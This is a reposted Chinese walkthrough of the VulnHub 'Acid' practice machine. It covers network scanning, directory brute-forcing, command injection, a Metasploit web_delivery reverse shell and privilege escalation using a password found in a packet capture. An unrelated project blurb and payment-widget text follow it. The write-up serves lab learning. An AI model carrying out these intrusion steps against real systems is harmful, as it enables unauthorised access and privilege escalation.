Vulnhub Acid

1、信息收集

1.1、netdiscover

netdiscover -i eth0 -r 192.168.118.0/24

1.2、 Nmap

nmap -sP -T4 192.168.118.0/24

nmap -sS -T4 -sV -O -p- 192.168.118.146

1.3 33447

view-source:http://192.168.118.146:33447/

 643239334c6d70775a773d3d  ==》 wow.jpg

1.4 wow.jpg

notepad++ 打开 

3761656530663664353838656439393035656533376631366137633631306434

==》

7aee0f6d588ed9905ee37f16a7c610d4

7aee0f6d588ed9905ee37f16a7c610d4

MD5 解密==》63425 (后面发现并没什么卵用)

1.5 dirbuster爆破

标题俩个路径:

http://192.168.118.146:33447/Challenge/

http://192.168.118.146:33447/Challenge/cake.php

==>

/Magic_Box

 再次爆破目录:

http://192.168.118.146:33447/Challenge/Magic_Box/command.php

 

 

2、漏洞挖掘

命令注入:

http://192.168.118.146:33447/Challenge/Magic_Box/command.php

3、 反弹shell

3.1、请移步:web_delivery

use exploit/multi/script/web_delivery 

su: must be run from a terminal

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

4、权限提升

cat /etc/passwd,发现需要关注的用户有:acid,saman,root

find / -user acid 2>/dev/null

发一个hint.pcapng

打开后跟踪tcp流

发现saman的密码:1337hax0r

su提权到saman、root,获得flag

再使用sudo -i 提权到root,密码同样是1337hax0r,获得位于root目录的flag.txt

notepad:

1、查找acid用户的文件

find / -user acid 2>/dev/null

2、使用metasploit反弹shell

exploit/multi/script/web_delivery 

 

转载于:https://www.cnblogs.com/zhuxr/p/9996426.html

Security-feature-detection-system 安全检测系统 简介 安全检测系统-多目标识别(YOLOv5)和人脸识别(Facenet)快速部署系统。 功能上:本项目使用YOLOv5实现多目标识别,使用Facenet实现人脸识别,最终需要人脸和此人应具备的多目标同时满足才能通过安全检测,部署上:使用pyqt5实现前端可视化,在前端页面运行YOLOv5多目标识别系统(将模型运行封装到Qt中),使用Docker封装人脸识别后端系统,使用网络请求等包实现前后端交互 案例:进行多目标识别的同时,进行人脸识别,前端系统发送请求,携带参数到后端进行人脸识别,最终返回人脸识别结果,获取人脸识别结果后,检索该成员应具备的多目标特征,与YOLOv5多目标识别的实际结果进行比对,若无误则通过安全检测。 根据原作 https://pan.quark.cn/s/9784cdf4abfd 的源码改编 项目背景 出于一些比赛的需要,以及逃离懵懂状态开始探索,我于2023.12~2024.1(大二上)开始一些CV、LLM项目的研究,苦于能力有限,当时大部分的项目都是依托开源搭建而来,诸如本项目就是依托开源的Compreface和Yolov5搭建,我只不过做了缝合的工作,所以在此必须提及这两个项目的巨大贡献:https://.com/exadel-inc/CompreFace https://.com/ultralytics/yolov5 今天是2024.7.11(大二下暑假),时隔半年我才开始这个项目的开源工作是因为,半年前的水平有限,虽然自己能实现项目的运作,但是恐很多细节介绍不好,当然本文自发出,后续我还会跟进,欢迎指正:22012100039@stu.xidian.edu.c...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值